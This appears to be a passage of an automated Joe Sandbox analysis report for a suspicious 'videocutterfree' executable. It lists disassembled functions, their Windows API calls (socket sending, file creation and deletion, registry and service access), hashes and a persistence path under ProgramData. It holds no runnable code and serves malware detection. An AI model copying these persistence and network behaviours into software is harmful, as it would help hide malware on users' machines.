                                                                              • Instruction ID: 962e1b1610661d3a1e462a8b273bca422d9ebd6187fa78b1c09a080216cc8bfc
                                                                              • Opcode Fuzzy Hash: 362507cdea3c59e5e26117a5169c73cb1c5d87df6245f0c2e6d9d49324ef9da2
                                                                              • Instruction Fuzzy Hash: A421D571E10204BBDF10EFADC4157AEBBF9EF85320F10855AE819D7381EB745A058BA1
                                                                              APIs
                                                                              Strings
                                                                              • C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe, xrefs: 0040B4E6
                                                                              • alue, xrefs: 00402258
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: ManagerOpen
                                                                              • String ID: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe$alue
                                                                              • API String ID: 1889721586-2373946520
                                                                              • Opcode ID: 1ec922f503a5089f2441f4c250cf0fe654bd0936957e94c64760dde43267d3b3
                                                                              • Instruction ID: 82190b26c313ca21e56521c4d65f8bd8d621bc10590b7f348398535519dc698c
                                                                              • Opcode Fuzzy Hash: 1ec922f503a5089f2441f4c250cf0fe654bd0936957e94c64760dde43267d3b3
                                                                              • Instruction Fuzzy Hash: 2D019C3108D351AFC7628AB14D855D63BA4CA2031833444FFC581BB1D3C67A4943E7DA
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime
                                                                              • String ID: /chk$XiM#
                                                                              • API String ID: 481472006-2768313731
                                                                              • Opcode ID: 8c5aba3fe0fa9f137425eb01b0bbaf6ff7050e0c22bc88d6cf42cc0881ca5301
                                                                              • Instruction ID: 5ded67f0c47026148cad850e193f09b8a616d489b1529ba96003877de93fe800
                                                                              • Opcode Fuzzy Hash: 8c5aba3fe0fa9f137425eb01b0bbaf6ff7050e0c22bc88d6cf42cc0881ca5301
                                                                              • Instruction Fuzzy Hash: 0CD05E30C0824AFECA006B50DA4982A76B1EB013047308077D413B11E0C33C5512AF9F
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: bce6262763b9821d62e4d750c62895ba665ddcf4d913ac3f7b1a51e4d70f835d
                                                                              • Instruction ID: d146ad5e05d5316f4872df89a4b0f8334c82388fba163a8a338afcec992236a5
                                                                              • Opcode Fuzzy Hash: bce6262763b9821d62e4d750c62895ba665ddcf4d913ac3f7b1a51e4d70f835d
                                                                              • Instruction Fuzzy Hash: 3A513AB1904206DFCF04DF68D5416AABBB4FF48320F10C55EF8299B381D7759A10CBA1
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 009936A7
                                                                                • Part of subcall function 00992420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00992432
                                                                                • Part of subcall function 00992420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00992445
                                                                                • Part of subcall function 00992420: RtlEnterCriticalSection.NTDLL(?), ref: 00992454
                                                                                • Part of subcall function 00992420: InterlockedExchange.KERNEL32(?,00000001), ref: 00992469
                                                                                • Part of subcall function 00992420: RtlLeaveCriticalSection.NTDLL(?), ref: 00992470
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 1601054111-0
                                                                              • Opcode ID: 8045ebb2e5e0eb76cc7b7dae84f7d98a023222fce8847ab1d0e9c815f10c61e8
                                                                              • Instruction ID: d25d2efcfa5d90ff86ea8544a80833001be90a8c1869923c628921bceec3a4ff
                                                                              • Opcode Fuzzy Hash: 8045ebb2e5e0eb76cc7b7dae84f7d98a023222fce8847ab1d0e9c815f10c61e8
                                                                              • Instruction Fuzzy Hash: 0F11E7B5104208BBDF219F5CDC45FAA3B69EF44350F108516FD52C62A0C739EA609B94
                                                                              APIs
                                                                              • __beginthreadex.LIBCMT ref: 009A0EB6
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000002,00999738,00000000), ref: 009A0EE7
                                                                              • ResumeThread.KERNEL32(?,?,?,?,?,00000002,00999738,00000000), ref: 009A0EF5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandleResumeThread__beginthreadex
                                                                              • String ID:
                                                                              • API String ID: 1685284544-0
                                                                              • Opcode ID: f38d2e292446db607e5c3d3a66e6b6dbea0b4d1b50ee9d63f4db23806182a55e
                                                                              • Instruction ID: 67f24d817726ca4da59ccec2cc8ea0721f92e6c5facb8faa9e8d7253843d860e
                                                                              • Opcode Fuzzy Hash: f38d2e292446db607e5c3d3a66e6b6dbea0b4d1b50ee9d63f4db23806182a55e
                                                                              • Instruction Fuzzy Hash: 04F0C271204200AFD7209F5DDC80F9673E8AF89725F24092EF644D7291C3B1AC82AAD0
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(009C627C), ref: 00991ABA
                                                                              • WSAStartup.WS2_32(00000002,00000000), ref: 00991ACB
                                                                              • InterlockedExchange.KERNEL32(009C6280,00000000), ref: 00991AD7
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$ExchangeIncrementStartup
                                                                              • String ID:
                                                                              • API String ID: 1856147945-0
                                                                              • Opcode ID: 175cdb61e52a4ddf2bce4474439a3a04aea38c05e097c348ea3972cd95aca8c6
                                                                              • Instruction ID: 2693a2269adb31882d09a7bdc1debf302b95eeaccce4e568e74fe04e241449e7
                                                                              • Opcode Fuzzy Hash: 175cdb61e52a4ddf2bce4474439a3a04aea38c05e097c348ea3972cd95aca8c6
                                                                              • Instruction Fuzzy Hash: 5AD05E32A592045BD610BBE6AD0EF38772CE70A725F000315FC66C00D0EA56691495A7
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00994BF2
                                                                                • Part of subcall function 00991BA7: __EH_prolog.LIBCMT ref: 00991BAC
                                                                                • Part of subcall function 00991BA7: RtlEnterCriticalSection.NTDLL ref: 00991BBC
                                                                                • Part of subcall function 00991BA7: RtlLeaveCriticalSection.NTDLL ref: 00991BEA
                                                                                • Part of subcall function 00991BA7: RtlEnterCriticalSection.NTDLL ref: 00991C13
                                                                                • Part of subcall function 00991BA7: RtlLeaveCriticalSection.NTDLL ref: 00991C56
                                                                                • Part of subcall function 0099CEA7: __EH_prolog.LIBCMT ref: 0099CEAC
                                                                                • Part of subcall function 0099CEA7: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0099CF2B
                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00994CF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                              • String ID:
                                                                              • API String ID: 1927618982-0
                                                                              • Opcode ID: 30e15c6da5c69270ea3bd9d93d034ab1d90c80d0e945bab4770745a44a8ae743
                                                                              • Instruction ID: f9345d9f0494088d7a18ec40403686e67b065869c01855f9e2635a17bb5962c5
                                                                              • Opcode Fuzzy Hash: 30e15c6da5c69270ea3bd9d93d034ab1d90c80d0e945bab4770745a44a8ae743
                                                                              • Instruction Fuzzy Hash: 26513975D042489FDF15DFA8C485BEEFBB8EF48310F14815AE805AB392DB30AA44CB51
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID: 97?/
                                                                              • API String ID: 2962429428-2118945863
                                                                              • Opcode ID: 0a1820560a94fa35e3a226e94b028e0193ad3b676efd2d1a3e56bed0ef5caf77
                                                                              • Instruction ID: 967e9ae283055045c75330c3ed07ac2a0bb23a854fb790f633cad8a2c5d6b44e
                                                                              • Opcode Fuzzy Hash: 0a1820560a94fa35e3a226e94b028e0193ad3b676efd2d1a3e56bed0ef5caf77
                                                                              • Instruction Fuzzy Hash: 13214DF2908610AFE705AF08DC81779FBE5EF98710F16892DEAC483744E67448408B96
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992D47
                                                                              • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00992D5C
                                                                                • Part of subcall function 009992B8: WSAGetLastError.WS2_32(00000000,?,?,00992A51), ref: 009992C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Send
                                                                              • String ID:
                                                                              • API String ID: 1282938840-0
                                                                              • Opcode ID: 7db513687a4771f95bb51f4c50f9048a13854b83e83cd24d351bbe8a41bcf76e
                                                                              • Instruction ID: 26a45a2f5030255aee87de49dfbf740713ed5249a139b8119daa059fa7aabb04
                                                                              • Opcode Fuzzy Hash: 7db513687a4771f95bb51f4c50f9048a13854b83e83cd24d351bbe8a41bcf76e
                                                                              • Instruction Fuzzy Hash: 9B0171B5504205FFDB205F9D894486BBBECEB853A1720092EF859C3240DB759D0097A1
                                                                              APIs
                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,00402FAF,00000000), ref: 00403BF1
                                                                                • Part of subcall function 00403A98: GetVersionExA.KERNEL32 ref: 00403AB7
                                                                              • HeapDestroy.KERNEL32 ref: 00403C30
                                                                                • Part of subcall function 00403FB7: HeapAlloc.KERNEL32(00000000,00000140,00403C19,000003F8), ref: 00403FC4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocCreateDestroyVersion
                                                                              • String ID:
                                                                              • API String ID: 2507506473-0
                                                                              • Opcode ID: aacb09cbeb48cc76d96456f08ad0e2855dac2d182e52656872482b59be82ca71
                                                                              • Instruction ID: 1f8d6d03a574f78a5dbc7526ae3fe5f16a5abed6931fcacc24763859c1a1efe3
                                                                              • Opcode Fuzzy Hash: aacb09cbeb48cc76d96456f08ad0e2855dac2d182e52656872482b59be82ca71
                                                                              • Instruction Fuzzy Hash: 28F065B2759341ADFB306F705E4572A3D9C9B50757F10483BF501F81D0EBBC8690961A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValue
                                                                              • String ID:
                                                                              • API String ID: 3132538880-0
                                                                              • Opcode ID: 3b15842985ea571fc5274319ee977004e6d747577488aea3d6386d86f312ab07
                                                                              • Instruction ID: 286d2137decb703b2ba6424f4396009fe652a08dc4bb496cb5714d9023b4e1aa
                                                                              • Opcode Fuzzy Hash: 3b15842985ea571fc5274319ee977004e6d747577488aea3d6386d86f312ab07
                                                                              • Instruction Fuzzy Hash: B5D022308042039FC700ABA095040E83F71E72E31034A0030C413A2114DB360A52AA0C
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099511E
                                                                                • Part of subcall function 00993D7E: htons.WS2_32(?), ref: 00993DA2
                                                                                • Part of subcall function 00993D7E: htonl.WS2_32(00000000), ref: 00993DB9
                                                                                • Part of subcall function 00993D7E: htonl.WS2_32(00000000), ref: 00993DC0
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: htonl$H_prologhtons
                                                                              • String ID:
                                                                              • API String ID: 4039807196-0
                                                                              • Opcode ID: 304874ce778dd75448488c1fb928a8ea51088ef654986dabbd6ca5b03db0f2e5
                                                                              • Instruction ID: 4f9a00ef32c136df69f8706ac9d917b488877a50468375235021befddd65af82
                                                                              • Opcode Fuzzy Hash: 304874ce778dd75448488c1fb928a8ea51088ef654986dabbd6ca5b03db0f2e5
                                                                              • Instruction Fuzzy Hash: AF814AB5D0424ECFCF06DFA8D141AEEBBB8AF48314F14815AD851B7281EA356A05CFA1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 955064b59b3196362df5baeefaf1269eece73dd153ee31c8e9397015138c69f0
                                                                              • Instruction ID: b58e057fc2d87ccc4ffded20c4ee50149728bd0cbd8e0ead6543b43dd24c9011
                                                                              • Opcode Fuzzy Hash: 955064b59b3196362df5baeefaf1269eece73dd153ee31c8e9397015138c69f0
                                                                              • Instruction Fuzzy Hash: A231ECB150C6409FE716AF19DC827AEFBE0EF55320F0A0A2DDAC587351D6366840CA87
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 588fcc24ff719009a777ce777dfbc749dab5c55250b1a2bd5e55cd3cc2406c2c
                                                                              • Instruction ID: 941b343fadd44c114953813c842786ee2fe4e4e7504130f5f41c4db4e564bcbe
                                                                              • Opcode Fuzzy Hash: 588fcc24ff719009a777ce777dfbc749dab5c55250b1a2bd5e55cd3cc2406c2c
                                                                              • Instruction Fuzzy Hash: E82137B250C604AFE7167F19DC85BBABBE4EF58320F06092CE6C543750E6356850CA97
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099D775
                                                                                • Part of subcall function 00991A01: TlsGetValue.KERNEL32 ref: 00991A0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologValue
                                                                              • String ID:
                                                                              • API String ID: 3700342317-0
                                                                              • Opcode ID: 0740ccc323dc745eae800cbc8111922d652ac9b5d20612213b377e84b49d4de5
                                                                              • Instruction ID: f56bd4977948bf912854d709b11c220f071bbcb30c2ff5ac6fcaa6f2fc797f53
                                                                              • Opcode Fuzzy Hash: 0740ccc323dc745eae800cbc8111922d652ac9b5d20612213b377e84b49d4de5
                                                                              • Instruction Fuzzy Hash: FE214FB1905209AFDF00DFA8D581BEEBBF8FF49310F10442AE804E3241D775A901CBA1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: a25ffb7b4f4858c4f0f51c4bb7c61693fb4f288fed42dc53c23d11ef154dd6fb
                                                                              • Instruction ID: cd56275ae1f2321ba839c17352d5888ebfe664e1bb408021d06e9d82bae90e86
                                                                              • Opcode Fuzzy Hash: a25ffb7b4f4858c4f0f51c4bb7c61693fb4f288fed42dc53c23d11ef154dd6fb
                                                                              • Instruction Fuzzy Hash: 64214AB250C600AFE3157F19D8867BAF7E4FF58721F06092CEBC593710DA3568508A97
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 26a53dd28cac0999f9ec941be806d66d1f7025ac5c313dfb6ae5a33366716217
                                                                              • Instruction ID: 1d2d9ae27bc955a732a976e2737d17179e4725ebf30f2348b5e93af04c69a172
                                                                              • Opcode Fuzzy Hash: 26a53dd28cac0999f9ec941be806d66d1f7025ac5c313dfb6ae5a33366716217
                                                                              • Instruction Fuzzy Hash: E311F9F151C7009FE3197F09EC856BABBE4EF88721F06892DE6C553640EA3564408A9B
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: 0d7c23aa80e3d32b8f33dc09ede03e546d27027f4a93bf31c0c89e4ed17230cc
                                                                              • Instruction ID: 02f72abc7676810c6a39b6291507d17308d2cb93c0db382abf20fe1edd44ad53
                                                                              • Opcode Fuzzy Hash: 0d7c23aa80e3d32b8f33dc09ede03e546d27027f4a93bf31c0c89e4ed17230cc
                                                                              • Instruction Fuzzy Hash: 42015BF245C718AFE7197A08EC867B9B7E4EB14310F0A052DDBD043340FA3669148ADB
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: a155f339f56ce1bd6cd0178ea6e66cea2f7cdb7da29d0c97348ed384cea35ef3
                                                                              • Instruction ID: f1fbad109dfddb230723c8a3674d8e82186fbec3b7e21f051d62ed124137c0a9
                                                                              • Opcode Fuzzy Hash: a155f339f56ce1bd6cd0178ea6e66cea2f7cdb7da29d0c97348ed384cea35ef3
                                                                              • Instruction Fuzzy Hash: 8B01B1B180D610EFD710BF18D8803B9BBE4EF44320F16083EEAE883240E63508448B97
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: fc18e2f6292c9321619dc4de1704e15e0f2fe16df16c278315069314b46f4c24
                                                                              • Instruction ID: e39af90385e2cbf6c1ad55de28f56484ac6ec9ea560f0c4cc6428a90195e3760
                                                                              • Opcode Fuzzy Hash: fc18e2f6292c9321619dc4de1704e15e0f2fe16df16c278315069314b46f4c24
                                                                              • Instruction Fuzzy Hash: 09F037B241C610DBD3117F19EC857BAFBE0FF48710F06492CEAC593610D63468409A87
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099D305
                                                                                • Part of subcall function 009926DB: RtlEnterCriticalSection.NTDLL(?), ref: 00992706
                                                                                • Part of subcall function 009926DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0099272B
                                                                                • Part of subcall function 009926DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B4903), ref: 00992738
                                                                                • Part of subcall function 009926DB: SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 00992778
                                                                                • Part of subcall function 009926DB: RtlLeaveCriticalSection.NTDLL(?), ref: 009927D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                              • String ID:
                                                                              • API String ID: 4293676635-0
                                                                              • Opcode ID: 7358112a0587489e1b523ec695325c0f0f13e4b7496bc6edbf897d88353b1996
                                                                              • Instruction ID: c724a9ba9c2e10b591c4445626536709fff92dc371a6a12d169f349aa72ff6f8
                                                                              • Opcode Fuzzy Hash: 7358112a0587489e1b523ec695325c0f0f13e4b7496bc6edbf897d88353b1996
                                                                              • Instruction Fuzzy Hash: 19019EB1915B04DFC728CF4AD640A95FBF4EF88310B15C5AEE4599B722E7B1AA40CF90
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 15eed211e77d059ccdbc6a5d9df28cc36a1c51e6bec7c3fcfb08bb6ce98b1d37
                                                                              • Instruction ID: d248b396f610f18d4aa8d44381813f2aa2c3496366a82a12918c319db2dc6483
                                                                              • Opcode Fuzzy Hash: 15eed211e77d059ccdbc6a5d9df28cc36a1c51e6bec7c3fcfb08bb6ce98b1d37
                                                                              • Instruction Fuzzy Hash: 06F034B2818410EBD3116F05D882BAABBF0FBA8320F06882CEAD993610D2345C509A86
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099D0E4
                                                                                • Part of subcall function 009A28FC: _malloc.LIBCMT ref: 009A2914
                                                                                • Part of subcall function 0099D300: __EH_prolog.LIBCMT ref: 0099D305
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$_malloc
                                                                              • String ID:
                                                                              • API String ID: 4254904621-0
                                                                              • Opcode ID: 8c16685c28cc5d598cf6ded97810c8713d0e6786595ac5bb590ca4f40c027088
                                                                              • Instruction ID: 0d6809ecd6f2563c3664abd66d1f504b5a8bd9522b51059a42e9f43afeec1a6e
                                                                              • Opcode Fuzzy Hash: 8c16685c28cc5d598cf6ded97810c8713d0e6786595ac5bb590ca4f40c027088
                                                                              • Instruction Fuzzy Hash: 21E0C271A09209AFDF1CEF6CE91276E77A4EF84300F00417DB809D2340EF704A0096C0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 60c6d250dd8deafff80095abf1aff810b165ed4452ff0b193a1f032e3edf02ec
                                                                              • Instruction ID: c37de035f001e2575d72327a0c5cf83c98fb28e17e726e10f7ca0a9de17df0c3
                                                                              • Opcode Fuzzy Hash: 60c6d250dd8deafff80095abf1aff810b165ed4452ff0b193a1f032e3edf02ec
                                                                              • Instruction Fuzzy Hash: 12E0B631B00216CBCB00DF68D9D899A77B4FF457407944566E812EB281D3B4DE928F89
                                                                              APIs
                                                                                • Part of subcall function 009A4A0A: __getptd_noexit.LIBCMT ref: 009A4A0B
                                                                                • Part of subcall function 009A4A0A: __amsg_exit.LIBCMT ref: 009A4A18
                                                                                • Part of subcall function 009A2243: __getptd_noexit.LIBCMT ref: 009A2247
                                                                                • Part of subcall function 009A2243: __freeptd.LIBCMT ref: 009A2261
                                                                                • Part of subcall function 009A2243: RtlExitUserThread.NTDLL(?,00000000,?,009A2223,00000000), ref: 009A226A
                                                                              • __XcptFilter.LIBCMT ref: 009A222F
                                                                                • Part of subcall function 009A7B44: __getptd_noexit.LIBCMT ref: 009A7B48
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                              • String ID:
                                                                              • API String ID: 1405322794-0
                                                                              • Opcode ID: 6cb8603573858b22b8b06a2303f1203154468118029d035cbefa90d28a724df3
                                                                              • Instruction ID: 1a66f6e972aa394491fdd7cb0b029c94326daa38727df699a12b2f20889ad1ef
                                                                              • Opcode Fuzzy Hash: 6cb8603573858b22b8b06a2303f1203154468118029d035cbefa90d28a724df3
                                                                              • Instruction Fuzzy Hash: CDE0ECB1D446009FDB08ABE4C90AF6EB764EFC6311F200189F1019B2A2CAB4A940DA65
                                                                              APIs
                                                                              • RegCreateKeyExA.KERNEL32(80000002), ref: 0040B20A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: c180f83c92dcf548fa8beb38ef1c74d29429782547c7cfcdca1407f97ebc0979
                                                                              • Instruction ID: b93f1b6f92246b3ccca9399eed210d9ae217db7478896dc1bd7db65c6538cfba
                                                                              • Opcode Fuzzy Hash: c180f83c92dcf548fa8beb38ef1c74d29429782547c7cfcdca1407f97ebc0979
                                                                              • Instruction Fuzzy Hash: C7C01230A08204EAD61497109E48B653164D704704F6001B7A217B00E1D7795A51A64F
